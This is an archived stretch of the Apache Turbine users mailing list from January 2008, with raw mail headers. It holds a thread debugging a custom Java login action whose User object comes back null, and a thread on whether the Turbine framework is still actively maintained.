FILETIME=[6AA6AD30:01C8643D] X-Virus-Checked: Checked by ClamAV on apache.org ------_=_NextPart_001_01C8643D.6AA21AC6 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Thanks Jeffrey, The problem is not in logging a user in... the action I have is doing = that just fine. The problem is when you try to detect if a user calling = the login action is ALREADY logged in or not (in this case, we have = guest users coming in from another site).=20 I want to make it so if the user is already logged in, it does not log = them in again. However, when I test the User returned in the doperform() = method in my login action, it is always NULL. It appears that something = up the chain is wiping the User object and the session. --Nathan -----Original Message----- From: Jeffery Painter [mailto:[email protected]] Sent: Thu 1/31/2008 1:08 PM To: Turbine Users List Subject: RE: user is nulled out on login attempt =20 I had used Turbine to build a prototype of an electronic health record system. I can't remember if we were using Turbine 2.1 or 2.2 but I have my = custom login action is here: http://office.kiasoft.com/viewcvs/viewcvs.cgi/agrippa/WebRoot/WEB-INF/src= /edu/ncsu/csc/agrippa/modules/actions/AgrippaLoginUser.java?rev=3D161.129.204.104= &content-type=3Dtext/vnd.viewcvs-markup Maybe that will give you some insight... it worked last time I ran the code but that was Dec 2006... Hope it helps --=20 Jeffery Painter Knowledge Engineer Semantic Technologies Group Statistical and Quantitative Sciences GlaxoSmithKline Research and Development > I don't get that. The test is if the user is NOT null. > > Anyway, it does work. I took it from my SNA login code (our first > Turbine project.) > > -----Original Message----- > From: Shaw, Nathan (HQ-LD070)[InDyne, Inc] > [mailto:[email protected]] > Sent: Thursday, January 31, 2008 12:17 PM > To: Turbine Users List > Subject: RE: user is nulled out on login attempt > > I don't think that will work because that will mean that the user is > null and is not logged [email protected]. It will actually probably be caught = by > the SessionValidator and just take them back to the login page. > > I am actually checking the User object and outputting whether it is = null > or not in the login action. I tried both getUser() and > getUserFromSession() and they are both NULL every single time a login = is > attempted. Something up the chain is clearing all of that out before = the > login occurs. > > --Nathan > > > -----Original Message----- > From: Altner, Bruce (HQ-LD070)[InDyne, Inc] > [mailto:[email protected]] > Sent: Thu 1/31/2008 9:29 AM > To: Turbine Users List > Subject: RE: user is nulled out on login attempt > > How about just doing this, early in the Login action doPerform method > (first thing?): > > > if ( data.getUserFromSession() !=3D null ) > { > return; > } > > > Bruce > > -----Original Message----- > From: Shaw, Nathan (HQ-LD070)[InDyne, Inc] > [mailto:[email protected]] > Sent: Thursday, January 31, 2008 8:35 AM > To: [email protected] > Subject: user is nulled out on login attempt > > > Hi all, > > I am writing my own login action and need to be able to check to see = if > a user is already logged in when the action is called. If they are, I > want to skip the login stuff to preserve their session. However, every > single time that the login action is called, the User object is coming > back NULL. > > Here is a code snippet. Does anyone have any idea WHY the user is = coming > back NULL? I assume something is happening in Turbine somewhere that > wipes the User on a login attempt or something? > > > public class OutageCalLoginUser extends LoginUser { > > public void doPerform( RunData data, Context context) throws Exception = { > String uname ; > String passwd ; > > System.out.println("doPerform(data, context)"); > if ( data.getUserFromSession() =3D=3D null ){ > System.out.println("user from session is null"); > }else{ > System.out.println("user from session is NOT null"); > } > > if(data.getUser() =3D=3D null){ > System.out.println("user is null"); > }else{ > System.out.println("user is NOT null"); > if(data.getUser().hasLoggedIn()){ > System.out.println("user is logged in"); > }else{ > System.out.println("user is NOT logged in"); > } > } > > > if((data.getUser() =3D=3D null) || (data.getUser() !=3D null && > data.getUser().hasLoggedIn() =3D=3D false)){ > > try { > SymEncDec enc =3D SymEncDec.getInstance(); > > // Username/password =3D username/pswd coming through front > door. > // User coming from elsewhere will have neither username > nor pswd. > String username =3D data.getParameters().get("username"); > String pswd =3D data.getParameters().get("password"); > > // If username exists, user came in the front door. > if (username !=3D null && username.length()>0) { > uname =3D username; > passwd =3D pswd; > }else { > uname =3D "guest"; > String encryptedPasswd =3D > TurbineResources.getString("guest.credential"); > passwd =3D encryptedPasswd; > //enc.decodeBase64Decrypt(encryptedPasswd); > } > // Log the user in > doLogin(data, uname, passwd); > > try { > Utils.getUserID(data); > } > catch (NullPointerException npe) { > throw new TurbineSecurityException("Bad username or > password, I say!"); > } > > } > catch ( TurbineSecurityException se ) { > badUserOrPassword(se, data); > } > catch (Exception e) { > throw new PortalVelocityException(e.getMessage()=3Dull?": > "+e.getMessage():e.getMessage(), > e.getCause()=3Dull?e:e.getCause(), data); > } > > } > } > > } > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > > > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] ------_=_NextPart_001_01C8643D.6AA21AC6-- From [email protected] Thu Jan 31 19:50:32 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95903 invoked from network); 31 Jan 2008 19:50:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jan 2008 19:50:32 -0000 Received: (qmail 27068 invoked by uid 500); 31 Jan 2008 19:50:24 -0000 Delivered-To: [email protected] Received: (qmail 26795 invoked by uid 500); 31 Jan 2008 19:50:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 26786 invoked by uid 99); 31 Jan 2008 19:50:23 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 11:50:23 -0800 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO outmail129153.authsmtp.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 19:50:07 +0000 Received: from outmail128178.authsmtp.net (outmail128178.authsmtp.net [161.129.204.104]) by punt2.authsmtp.com (8.13.8/8.13.8/Kp) with ESMTP id m0VJnxXp062809 for <[email protected]>; Thu, 31 Jan 2008 19:49:59 GMT Received: from [161.129.204.104] (p57AB26BD.dip0.t-ipconnect.de [161.129.204.104]) (authenticated bits=0) by mail.authsmtp.com (8.13.8/8.13.8/Kp) with ESMTP id m0VJnw5v018235 for <[email protected]>; Thu, 31 Jan 2008 19:49:58 GMT Message-ID: <[email protected]> Date: Thu, 31 Jan 2008 20:49:56 +0100 From: Thomas Vandahl <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20071031) MIME-Version: 1.0 To: Turbine Users List <[email protected]> Subject: Re: what is current status and likely future of turbine ? References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 0.95.6 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Server-Quench: b4574f53-d035-11dc-9554-001185d377ca X-AuthRoute: OCdyaAgQClZJUiwT EioPDCIGTh8qMABX DAUrMRZAKlsPWEJY Kk9RLlcVN0cTUwoA HBxaBUtWUF15SWJ8 YQ5YZwBULEJJQQRt UVZKSkxTHAx3Axke BlBDUn8IKUJDPn5x bURhWz5ZVEd4OxR5 R0lQQ2gFeDNga2UC UUEMJB5ddQZOYx9F a1F3UScOZmJUNzQC El17IDA4IX1eM2xe XxsXIFQOCV0XFyIh XFgLGzlnGUwGSiEi ZxI7NkMGEQ4WPA0u LEErWFQVe0h6 X-Authentic-SMTP: 61633138303539.squirrel.dmpriest.net.uk:787/Kp X-Report-SPAM: If SPAM / abuse - report it at: http://www.authsmtp.com/abuse X-Virus-Status: No virus detected - but ensure you scan with your own anti-virus system! X-Virus-Checked: Checked by ClamAV on apache.org Scott Eade wrote: > We hope to release 2.3.3 real soon now. The blocker is that we want to > use Torque 3.3 and we want to wait another week before voting on that so > that people will have had a chance to provide feedback on it's RC-3 > release. I don't believe we have any plans for a 2.3.3 RC release - > straight to final would be my suggestion. Yep that would have been my suggestion as well. >> 3. Is there any active work on the turbine code base ? > As time permits we (and this includes Siegfried and others) are working > on tidying up the trunk in order to get to a 2.4 release, but progress > is indeed very slow. I made a couple of cleanup back-and-forth-ports between the 2.3-branch and the Fulcrum components during the last year and will strive to release some Fulcrum services one-by-one (and kill others). >> 4. If there is no work, is that because it all just works or because >> everybody has abandoned turbine in favor of something else ? > It is probably fair to say that many have moved to other frameworks that > are more in vogue, however there are plenty of people that have existing > applications that need to be maintained into the future so support for > and slow forward progress of turbine should still occur. Your point > about stability may also be true to a certain extent. I strongly believe that Turbine is well-suited for a fair number of web applications. Applications are easy to write and easy to maintain. Extensions to the framework can be easily integrated. The different service backends open the doors to a lot of ready-made components. And Turbine 2.3.2 is (almost) rock-solid. On my list of wishes for Turbine are better I18N-support, a bit more flexibility with screen elements and a generic JSR-223-support in the backend (I hate^Wneed PHP). All these will come up if time permits. > Another option to consider is diving in and helping with turbine. It > sounds like you have a long term interest in the continued support of > turbine so why not invest a little time in keeping it moving forward. > After a couple of decent patches we are usually fairly happy to vote on > commit access. I would like to second that. If you have anything you want to contribute, please do. Bye, Thomas. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jan 31 20:02:01 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 638 invoked from network); 31 Jan 2008 20:02:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jan 2008 20:02:01 -0000 Received: (qmail 47631 invoked by uid 500); 31 Jan 2008 20:01:52 -0000 Delivered-To: [email protected] Received: (qmail 47618 invoked by uid 500); 31 Jan 2008 20:01:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 47609 invoked by uid 99); 31 Jan 2008 20:01:52 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 12:01:52 -0800 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO outmail136022.authsmtp.co.uk) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 20:01:36 +0000 Received: from outmail128178.authsmtp.net (outmail128178.authsmtp.net [161.129.204.104]) by punt3.authsmtp.com (8.13.8/8.13.8/Kp) with ESMTP id m0VK1Om2051941 for <[email protected]>; Thu, 31 Jan 2008 20:01:28 GMT Received: from [161.129.204.104] (p57AB26BD.dip0.t-ipconnect.de [161.129.204.104]) (authenticated bits=0) by mail.authsmtp.com (8.13.8/8.13.8/Kp) with ESMTP id m0VK1LDM026671 for <[email protected]>; Thu, 31 Jan 2008 20:01:22 GMT Message-ID: <[email protected]> Date: Thu, 31 Jan 2008 21:01:19 +0100 From: Thomas Vandahl <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20071031) MIME-Version: 1.0 To: Turbine Users List <[email protected]> Subject: Re: user is nulled out on login attempt References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 0.95.6 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Server-Quench: 4c0adcaf-d037-11dc-9554-001185d377ca X-AuthRoute: OCdyaAgQClZJUiwT EioPDCIGTh8qMABX DAUrMRZAKlsPWEJY Kk9RLlcVN0cTUwoA HBxaBUtWUF15SWF1 YQpQZwdeLEJJQQRt UVZKSkxTHAx3Axke BlBDUn8JdnkyBX5y Y0BlXz5aX0V6O0Iu Qh8ARjxQeDNga2cC UUEMJB5ddQZOYx9F a1F3UScOZmJUNzQC El17Iis8J31eM2xT XwUJIF5aRlsXVjk6 DxQFEjQpVUQZWyg2 NwBO X-Authentic-SMTP: 61633138303539.squirrel.dmpriest.net.uk:787/Kp X-Report-SPAM: If SPAM / abuse - report it at: http://www.authsmtp.com/abuse X-Virus-Status: No virus detected - but ensure you scan with your own anti-virus system! X-Virus-Checked: Checked by ClamAV on apache.org Shaw, Nathan (HQ-LD070)[InDyne, Inc] wrote: > I want to make it so if the user is already logged in, it does not log them in again. However, when I test the User returned in the doperform() method in my login action, it is always NULL. It appears that something up the chain is wiping the User object and the session. This is exactly the task of the SessionValidator. Which SessionValidator do you use? Bye, Thomas. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jan 31 20:38:32 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17599 invoked from network); 31 Jan 2008 20:38:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jan 2008 20:38:32 -0000 Received: (qmail 18731 invoked by uid 500); 31 Jan 2008 20:38:23 -0000 Delivered-To: [email protected] Received: (qmail 18712 invoked by uid 500); 31 Jan 2008 20:38:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 18703 invoked by uid 99); 31 Jan 2008 20:38:23 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 12:38:23 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail007.fastfreedom.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 20:37:55 +0000 Received: from localhost (unknown [161.129.204.104]) by mail007.fastfreedom.net (Postfix) with ESMTP id 6F0751C1CDA for <[email protected]>; Thu, 31 Jan 2008 14:37:04 -0600 (CST) X-Virus-Scanned: [email protected] Received: from mail007.fastfreedom.net ([161.129.204.104]) by localhost (mail007.fastfreedom.net [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id oe+WSMh2oBQj for <[email protected]>; Thu, 31 Jan 2008 14:36:59 -0600 (CST) Received: from [161.129.204.104] (unknown [161.129.204.104]) (Authenticated sender: [email protected]) by mail007.fastfreedom.net (Postfix) with ESMTP id E92501C1C05 for <[email protected]>; Thu, 31 Jan 2008 14:36:58 -0600 (CST) Message-ID: <[email protected]> Date: Thu, 31 Jan 2008 13:33:45 -0700 From: AFrieze <[email protected]> User-Agent: Thunderbird 161.129.204.104pre (X11/20071023) MIME-Version: 1.0 To: Turbine Users List <[email protected]> Subject: Re: what is current status and likely future of turbine ? References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Tony Oslund wrote: > Adoption of technology should be based upon things such as need, cost, > ease of use, maintainability, and availability of resources, past > success, amongst others. > > I find that Turbine in conjunction with Velocity serves these needs very > well. > > I have also wondered at times why this site is very quiet, and then I > realize that I rarely need to post questions, since there is the > archive. > > It would be a shame to see a great technology fall by the wayside simply > because it has been successful, people learn it quickly, the community > has been supportive, and because others make more noise. > > You used the term "several projects", which probably means several > successful projects. > > Perhaps more noise is the answer... > > > -----Original Message----- > From: Nick Ide [mailto:[email protected]] > Sent: Wednesday, January 30, 2008 4:10 PM > To: [email protected] > Subject: what is current status and likely future of turbine ? > > > We have built several projects in the past using turbine. > We are beginning a new project and trying to decide whether to > use turbine or try something else. > We are a little concerned that turbine is dead or dying from lack of > community. > > My questions: > > 1. When will turbine 2.3.3 be released ? > 2. Is anybody working on that release ? > 3. Is there any active work on the turbine code base ? > 4. If there is no work, is that because it all just works or because > everybody has abandoned turbine in favor of something else ? > 5. Probably asking the crowd since the people who voted with their feet > have stopped listening, but what do you suppose > people have adopted to use instead of turbine ? is it VelocityStruts ? > > is it Spring ? Others ? > > > -Nick > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > > Just thought I would pop in real quick to let you all know that this is something I have been very interested in as well. I have worked heavily with a turbine project for the last 3 years and it has worked quite well for me. I am about to start a new project, and was also curious if turbine is dead, or if its just completed and bug free... AFrieze --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jan 31 20:48:05 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23107 invoked from network); 31 Jan 2008 20:48:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jan 2008 20:48:05 -0000 Received: (qmail 33205 invoked by uid 500); 31 Jan 2008 20:47:55 -0000 Delivered-To: [email protected] Received: (qmail 33187 invoked by uid 500); 31 Jan 2008 20:47:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 33178 invoked by uid 99); 31 Jan 2008 20:47:55 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 12:47:55 -0800 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=RCVD_IN_DNSWL_LOW,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO relay4.mail.uk.clara.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 20:47:39 +0000 Received: from smtp.clara.net ([161.129.204.104]) by relay4.mail.uk.clara.net with esmtp (Exim 4.62) (envelope-from <[email protected]>) id 1JKgJn-0003fu-Qt for [email protected]; Thu, 31 Jan 2008 20:47:31 +0000 Received: from pjcourcouxdsl.claranet.co.uk ([161.129.204.104] helo=earth.courcoux.biz) by smtp.clara.net with esmtp (Exim 4.46) id 1JKgJk-0000NL-5m for [email protected]; Thu, 31 Jan 2008 20:47:31 +0000 Received: from localhost (localhost [161.129.204.104]) by earth.courcoux.biz (Postfix) with ESMTP id 7FD251D8C68 for <[email protected]>; Thu, 31 Jan 2008 21:38:14 +0000 (GMT) X-Virus-Scanned: [email protected] Received: from earth.courcoux.biz ([161.129.204.104]) by localhost (earth.courcoux.biz [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id UQzGhcJ4LqId for <[email protected]>; Thu, 31 Jan 2008 21:38:13 +0000 (GMT) Received: from [161.129.204.104] (unknown [161.129.204.104]) by earth.courcoux.biz (Postfix) with ESMTP id 3E3C61D8B8A for <[email protected]>; Thu, 31 Jan 2008 21:38:13 +0000 (GMT) Message-ID: <[email protected]> Date: Thu, 31 Jan 2008 20:47:21 +0000 From: Peter Courcoux <[email protected]> User-Agent: Thunderbird 161.129.204.104pre (X11/20071023) MIME-Version: 1.0 To: Turbine Users List <[email protected]> Subject: Re: what is current status and likely future of turbine ? References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org I have used turbine on a number of commercial projects, including some very large ones, for many years. I'm just writing a revision for a project and am using turbine 2.4M1. I am pleased to be able to second Thomas Vandahl's comments. It works for me! Regards, Peter AFrieze wrote: > Tony Oslund wrote: >> Adoption of technology should be based upon things such as need, cost, >> ease of use, maintainability, and availability of resources, past >> success, amongst others. >> I find that Turbine in conjunction with Velocity serves these needs very >> well. >> >> I have also wondered at times why this site is very quiet, and then I >> realize that I rarely need to post questions, since there is the >> archive. >> It would be a shame to see a great technology fall by the wayside simply >> because it has been successful, people learn it quickly, the community >> has been supportive, and because others make more noise. >> >> You used the term "several projects", which probably means several >> successful projects. >> >> Perhaps more noise is the answer... >> >> >> -----Original Message----- >> From: Nick Ide [mailto:[email protected]] Sent: Wednesday, January 30, >> 2008 4:10 PM >> To: [email protected] >> Subject: what is current status and likely future of turbine ? >> >> We have built several projects in the past using turbine. >> We are beginning a new project and trying to decide whether to >> use turbine or try something else. We are a little concerned that >> turbine is dead or dying from lack of community. >> >> My questions: >> >> 1. When will turbine 2.3.3 be released ? >> 2. Is anybody working on that release ? >> 3. Is there any active work on the turbine code base ? >> 4. If there is no work, is that because it all just works or because >> everybody has abandoned turbine in favor of something else ? >> 5. Probably asking the crowd since the people who voted with their >> feet have stopped listening, but what do you suppose >> people have adopted to use instead of turbine ? is it VelocityStruts ? >> >> is it Spring ? Others ? >> >> >> -Nick >> >> --------------------------------------------------------------------- >> To unsubscribe, e-mail: [email protected] >> For additional commands, e-mail: [email protected] >> >> >> --------------------------------------------------------------------- >> To unsubscribe, e-mail: [email protected] >> For additional commands, e-mail: [email protected] >> >> >> > Just thought I would pop in real quick to let you all know that this > is something I have been very interested in as well. I have worked > heavily with a turbine project for the last 3 years and it has worked > quite well for me. I am about to start a new project, and was also > curious if turbine is dead, or if its just completed and bug free... > > AFrieze > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jan 31 21:00:16 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26822 invoked from network); 31 Jan 2008 21:00:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jan 2008 21:00:16 -0000 Received: (qmail 47640 invoked by uid 500); 31 Jan 2008 21:00:06 -0000 Delivered-To: [email protected] Received: (qmail 47625 invoked by uid 500); 31 Jan 2008 21:00:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 47615 invoked by uid 99); 31 Jan 2008 21:00:06 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 13:00:06 -0800 X-ASF-Spam-Status: No, hits=-4.0 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO ndmsbar03.ndc.nasa.gov) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 20:59:50 +0000 Received: from ndmsxgw04.ndc.nasa.gov (ndmsxgw04.ndc.nasa.gov [161.129.204.104]) by ndmsbar03.ndc.nasa.gov (Spam Firewall) with ESMTP id 3DAB43E5CD2 for <[email protected]>; Thu, 31 Jan 2008 14:59:40 -0600 (CST) Received: from ndmsxgw04.ndc.nasa.gov (ndmsxgw04.ndc.nasa.gov [161.129.204.104]) by ndmsbar03.ndc.nasa.gov with ESMTP id cPesBFhglfojs00s for <[email protected]>; Thu, 31 Jan 2008 14:59:40 -0600 (CST) Received: from NDMSEVS37B.ndc.nasa.gov ([161.129.204.104]) by ndmsxgw04.ndc.nasa.gov with Microsoft SMTPSVC(262)914-4166); Thu, 31 Jan 2008 14:59:39 -0600 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----_=_NextPart_001_01C8644C.3219F3C9" Subject: RE: user is nulled out on login attempt Date: Thu, 31 Jan 2008 14:57:43 -0600 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: <[email protected]> Thread-Topic: user is nulled out on login attempt Thread-Index: AchkRCx1VNdIFLvEQGe/EVX7B9ZQrQAB8AW+ References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> From: "Shaw, Nathan (HQ-LD070)[InDyne, Inc]" <[email protected]> To: "Turbine Users List" <[email protected]> X-OriginalArrivalTime: 31 Jan 2008 20:59:39.0997 (UTC) FILETIME=[320B90D0:01C8644C] X-Virus-Checked: Checked by ClamAV on apache.org ------_=_NextPart_001_01C8644C.3219F3C9 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I assume you mean this? action.sessionvalidator=3Dsessionvalidator.TemplateSessionValidator But, it seems to me that the role of the SessionValidator is to ensure = that a user IS NOT logged in and send them somewhere if they are not. I = am trying to see if the user IS logged in and ,if they are, NOT re-log = them in. Maybe I am mis-interpreting the docs? --Nathan -----Original Message----- From: Thomas Vandahl [mailto:[email protected]] Sent: Thu 1/31/2008 3:01 PM To: Turbine Users List Subject: Re: user is nulled out on login attempt =20 Shaw, Nathan (HQ-LD070)[InDyne, Inc] wrote: > I want to make it so if the user is already logged in, it does not log = them in again. However, when I test the User returned in the doperform() = method in my login action, it is always NULL. It appears that something = up the chain is wiping the User object and the session. This is exactly the task of the SessionValidator. Which SessionValidator = do you use? Bye, Thomas. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] ------_=_NextPart_001_01C8644C.3219F3C9 Content-Type: text/plain; charset=us-ascii --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] ------_=_NextPart_001_01C8644C.3219F3C9-- From [email protected] Thu Jan 31 21:15:01 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34842 invoked from network); 31 Jan 2008 21:15:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jan 2008 21:15:01 -0000 Received: (qmail 69360 invoked by uid 500); 31 Jan 2008 21:14:52 -0000 Delivered-To: [email protected] Received: (qmail 69085 invoked by uid 500); 31 Jan 2008 21:14:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 69076 invoked by uid 99); 31 Jan 2008 21:14:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 13:14:51 -0800 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO elasmtp-junco.atl.sa.earthlink.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 21:14:36 +0000 Received: from [161.129.204.104] (helo=office.kiasoft.com) by elasmtp-junco.atl.sa.earthlink.net with asmtp (Exim 4.34) id 1JKgjr-00045E-UE for [email protected]; Thu, 31 Jan 2008 16:14:28 -0500 Received: by office.kiasoft.com (Postfix, from userid 48) id B4B20168851; Thu, 31 Jan 2008 15:16:57 -0500 (EST) Received: from 161.129.204.104 (SquirrelMail authenticated user painter) by webmail.kiasoft.com with HTTP; Thu, 31 Jan 2008 15:16:57 -0500 (EST) Message-ID: <[email protected]> In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Date: Thu, 31 Jan 2008 15:16:57 -0500 (EST) Subject: Re: what is current status and likely future of turbine ? From: "Jeffery Painter" <[email protected]> To: "Turbine Users List" <[email protected]> Reply-To: [email protected] User-Agent: SquirrelMail/1.4.8-2.fc6 MIME-Version: 1.0 Content-Type: text/plain;charset=iso-8859-1 X-Priority: 3 (Normal) Importance: Normal Content-Transfer-Encoding: quoted-printable X-ELNK-Trace: cf82c58664c8867910a091893a8585a77e972de0d01da9404e36aa76946dcea05afa2e59e50d5139350badd9bab72f9c350badd9bab72f9c350badd9bab72f9c X-Originating-IP: 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org It is nice to hear from the same old gang again... I remember most of the recent posters from several years back when I was a Turbine newbie... Unfortunately, my career has taken me into the dark side (C#/.net) but I must agree that if I were to have to write another web based app tomorrow= , I would still pick Turbine. It is a robust (and dependable) system. Maybe that is to explain for the lack of traffic in the past few months. Most of the projects I created with Turbine 3-4+ years ago are still in production (as far as I know) and fortunately "just work" cheers, Jeff > I have used turbine on a number of commercial projects, including some > very large ones, for many years. > > I'm just writing a revision for a project and am using turbine 2.4M1. I > am pleased to be able to second Thomas Vandahl's comments. It works for > me! > > Regards, > > Peter > > AFrieze wrote: >> Tony Oslund wrote: >>> Adoption of technology should be based upon things such as need, cost= , >>> ease of use, maintainability, and availability of resources, past >>> success, amongst others. >>> I find that Turbine in conjunction with Velocity serves these needs >>> very >>> well. >>> >>> I have also wondered at times why this site is very quiet, and then I >>> realize that I rarely need to post questions, since there is the >>> archive. >>> It would be a shame to see a great technology fall by the wayside >>> simply >>> because it has been successful, people learn it quickly, the communit= y >>> has been supportive, and because others make more noise. >>> >>> You used the term "several projects", which probably means several >>> successful projects. >>> >>> Perhaps more 